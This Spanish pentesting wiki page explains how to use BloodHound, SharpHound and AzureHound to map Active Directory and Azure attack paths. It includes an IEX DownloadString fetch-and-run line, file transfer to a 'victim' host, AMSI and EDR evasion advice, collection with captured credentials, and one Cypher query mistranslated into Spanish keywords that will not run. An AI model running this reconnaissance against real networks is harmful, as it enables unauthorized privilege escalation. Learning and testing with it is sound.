BloodHound
BloodHound es una herramienta que utiliza la teoría de grafos para mapear relaciones entre usuarios, grupos, equipos y permisos en AD.
Su enfoque basado en grafos permite visualizar relaciones y permisos dentro de un entorno Active Directory (AD) de forma clara y precisa, permitiendo identificar rutas de ataque.
Está formada por:
SharpHound: recolector que obtiene información desde el entorno.
BloodHound GUI: interfaz gráfica para visualizar e investigar rutas de ataque.
Neo4j: base de datos de grafos utilizada por BloodHound para almacenar los datos.
Para obtener los mejores resultados, sus versiones de Bloodhound y Sharphound deben ser compatibles.
Descarga o subida de SharpHound
Descarga directa en el equipo víctima
cd C:\Users\<usuario>\appdata\local\temp
git clone "https://github.com/BloodHoundAD/BloodHound.git"Transferencia desde otro servidor
Si no se puede descargar desde el propio equipo windows por no contar con acceso a internet, se puede descargar SharpHound.ps1 usando un servidor temporal desde un equipo que se encuentre en la misma red que el equipo víctima Windows.
En el equipo controlado por el atacante:
git clone "https://github.com/BloodHoundAD/BloodHound.git"
cd Collectors
python3 -m http.server 8000Otros: Misc
Desde el equipo windows víctima:
iwr "https://192.168.1.110/SharpHound.ps1"Otros: Misc
Métodos de recolección con SharpHound
https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html
Recolección desde Windows
Antes de ejecutar la herramienta, si hay AV, es necesario evadir la protección de AMSI: AMSI .NET Bypass
Puedes usar SharpHound.exe o SharpHound.ps1 para recolectar desde una máquina con acceso al dominio.
https://github.com/SpecterOps/BloodHound/blob/main/docs/collect-data/ce-collection/sharphound.mdx
EXE
Vía exe:
SharpHound.exe -c All --domain xtormincorp.localPowerShell
Vía PowerShell:
git clone "https://github.com/SpecterOps/BloodHound-Legacy.git"
cd BloodHound-Legacy\Collectors
. .\SharpHound.ps1IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/SpecterOps/BloodHound-Legacy/refs/heads/master/Collectors/SharpHound.ps1')Invoke-BloodHound -CollectionMethod All -v 2
Invoke-BloodHound -CollectionMethod All -domain xtormincorp.local -ldapuser <usuario> -ldappass <contraseña> -v 2SharpHound.exe -c SessionLoop -sSi el dominio es muy grande o se está en un entorno muy controlado por EDR o SOC. Es mejor realizar la recolección por partes:
Si se quiere filtrar por OU:
Invoke-Bloodhound -LDAPFilter "(CN=*,OU=New York,DC=Contoso,DC=Local)" -CollectionMethod ACL -ZipFilename OU_ACL_20250420 -StealhACLs:
Invoke-Bloodhound -Domain xtormincorp.local -CollectionMethod ACL -ZipFilename ACL_20250420 -StealhGrupos:
Invoke-Bloodhound -Domain xtormincorp.local -CollectionMethod Group -ZipFilename Group_20250420 -StealhLocalAdmin:
Invoke-Bloodhound -Domain xtormincorp.local -CollectionMethod LocalAdmin -ZipFilename LocalAdmin_20250420 -StealhEXE
Vía exe:
SharpHound.exe -c All --domain za.tryhackme.com --ExcludeDCsPowerShell
Vía PowerShell:
git clone https://github.com/SpecterOps/BloodHound-Legacy.git
cd BloodHound-Legacy\Collectors
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -v 2
Invoke-BloodHound -CollectionMethod All -domain xtormincorp.local -ldapuser <usuario> -ldappass <contraseña> -v 2Si el dominio es muy grande o se está en un entorno muy controlado por EDR o SOC. Es mejor realizar la recolección por partes:
ACLs:
Invoke-Bloodhound -Domain xtormincorp.local -CollectionMethod ACL -ZipFilename ACL_20250420 -StealhGrupos:
Invoke-Bloodhound -Domain xtormincorp.local -CollectionMethod ACL -ZipFilename ACL_20250420 -StealhRecolección remota desde Kali
Desde una máquina Kali se pueden hacer uso de las credenciales de los usuarios víctima para enumerar la información del AD:
bloodhound-python -u $USER -d xtormincorp.local -c all -v -ns <dns server or dc>Este método es ideal cuando tienes credenciales, pero no acceso a una máquina Windows.
Métodos de recolección con AzureHound
Conexión e importación: AzureHound
$passwd = ConvertTo-SecureString "<contraseña>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("<email>", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $credsRecolección desde Azure
. C:\Pentest\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -VerboseIngesta y visualización de datos - BloodHound
En entornos corporativos de gran tamaño, la arquitectura de Active Directory suele mantenerse bastante estable. Aunque pueda haber ciertos cambios como nuevas incorporaciones o ajustes menores, la estructura principal de unidades organizativas (OUs), usuarios, grupos y permisos rara vez sufre modificaciones drásticas.
Lo que sí cambia constantemente es otra cosa: las sesiones activas de los usuarios y los eventos de autenticación. Como Sharphound realiza una recopilación puntual del estado del dominio, la información relacionada con sesiones puede volverse obsoleta con rapidez, especialmente si los usuarios cierran sesión o si otras cuentas inician nuevas sesiones tras la recolección de datos.
Estrategia de ejecución recomendada
Para mantener una visión precisa y actual del entorno, es recomendable:
Realizar una primera ejecución de Sharphound utilizando
--CollectionMethods All, lo cual capturará toda la información relevante del dominio (estructura, permisos, relaciones, etc.).Posteriormente, realizar ejecuciones periódicas únicamente del método
Session, que se enfoca exclusivamente en detectar nuevas sesiones de usuario sin volver a recopilar toda la estructura AD.
Cuándo es mejor hacerlo
El momento ideal para capturar sesiones activas suele ser:
A media mañana (sobre las 10:00), cuando los usuarios ya han iniciado su jornada laboral.
Después del almuerzo (alrededor de las 15:00-16:00), justo antes de que comiencen a conectarse de nuevo tras volver de haber comido.
Limpieza de datos antiguos
Sharphound no elimina sesiones anteriores automáticamente, por lo que es buena idea purgar la información obsoleta antes de cargar nuevos datos. Desde BloodHound, accede a la pestaña "Database Info" y utiliza la opción "Clear Session Information" para mantener la base de datos limpia y centrada en sesiones realmente activas.
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html
Windows
https://bloodhound.readthedocs.io/en/latest/installation/windows.html
Linux
Instala BloodHound:
sudo apt install bloodhound
sudo neo4j consoleAccede a http://localhost:7474 y configura el password de
neo4j.Abre la GUI de BloodHound (
bloodhound).
bloodhoundHacer click en "Upload data" y importar el
.zipgenerado por SharpHound.
Consultas
Buscar todos los usuarios que tengan el rol de "Global Administrator":
MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN pTodas las rutas a las máquinas virtuales:
MATCH p = (n)-[r]->(g: AZVM) RETURN pTodas las rutas hacia "Azure KeyVaults":
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN pTodas las rutas hacia "Azure Resource Group":
MATCH p = (n)-[r]->(g:AZResourceGroup) RETURN pBuscar los Owners de "Azure Groups":
MATCH p = (n)-[r:AZOwns]->(g:AZGroup) RETURN pObtener todos los equipos con delegación sin restricciones que no forman parte del grupo de controladores de dominio:
COINCIDIR (dc:Computer)-[:MemberOf*1..]->(g:Group) DONDE g.objectsid TERMINA CON "516" CON COLLECT(dc) como domainControllers COINCIDIR p = (d:Domain)-[:Contains*1..]->(c:Computer {unconstraineddelegation:true}) DONDE NO c en domainControllers DEVUELVE cConsejos
Cuando comprometas un usuario o máquina, márcalo como Owned (Mark User as Owned).
Muchas consultar integradas utilizan esta propiedad del nodo para identificar caminos más cortos desde los principios que se poseen hasta ojetivos de alto valor.
Se muestran las acciones que se pueden ejecutar a continuación a partir de dichos nodos.
Marcar otros objetivos como de alto valor.
Por ejemplo, los equipos con delegación sin restricciones no se marcan como de alto valor. Sin embargo, si comprometes solo uno de ellos dentro de un dominio, eres el administrador del dominio.
Adaptación al contexto, un servidor SQL que almacene información altamente sensible de acuerdo a la naturaleza de la organización puede ser de alto valor para la organización.
Referencias
Última actualización
¿Te fue útil?